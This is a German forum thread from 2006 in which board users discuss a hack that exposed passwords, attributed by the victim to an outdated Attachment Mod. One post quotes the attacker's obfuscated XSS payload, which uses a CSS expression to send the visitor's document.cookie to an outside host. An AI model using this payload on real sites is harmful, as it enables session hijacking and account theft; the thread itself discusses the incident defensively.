Gehackt + Passwoerter ausgelesen! Wie?

Wissler · Beitrag von **Wissler** » 19.01.2006 20:23

daruler hat geschrieben: Auf welchen schadcode?

Na, den hier:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top :expression(eval(this.sss));'sss=`i=new/**/Image( );i.src='http://mouze.org/bin/c.php?c='+document .cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

larsneo · Beitrag von **larsneo** » 19.01.2006 20:32

yep. dazu dann noch die logfiles der zugriffe auswerten und juristische schritte einleiten. nachdem der angriff ja zur abwechslung einmal nicht automatisiert über irgendwelche anonymen brasilianischen proxies sondern gezielt von einem script kiddie durchgeführt wurde, hast du da unter umständen sogar ganz gute chancen.

daruler · Beitrag von **daruler** » 25.01.2006 17:50

Ich glaube kaum, dass ich rechtliche Schritte einleiten werde, da ich den "Hacker" kenne und er auch fast keinen Schaden angerichtet hat.

Ich glaube jedoch zu wissen wie der Hacker an die Passwoerter herankam:

http://www.phpbb.de/viewtopic.php?t=85972

Hallo,

der Fall hat sich geklärt. Es handelt sich nicht um einen Bug in Hotchis Download Mod, sondern um eine alte Version des Attachment Mods.

Es gibt nämlich 2 Dateien die ähnlich lauten: download.php und downloads.php

Ich habe (hatte) noch eine alte Version des Attachment Mods laufen, was ich nun korrigiert habe. Durch die alte Version des Attachment-Mods konnte der Hacker Zugriff auf mein Passwort bekommen.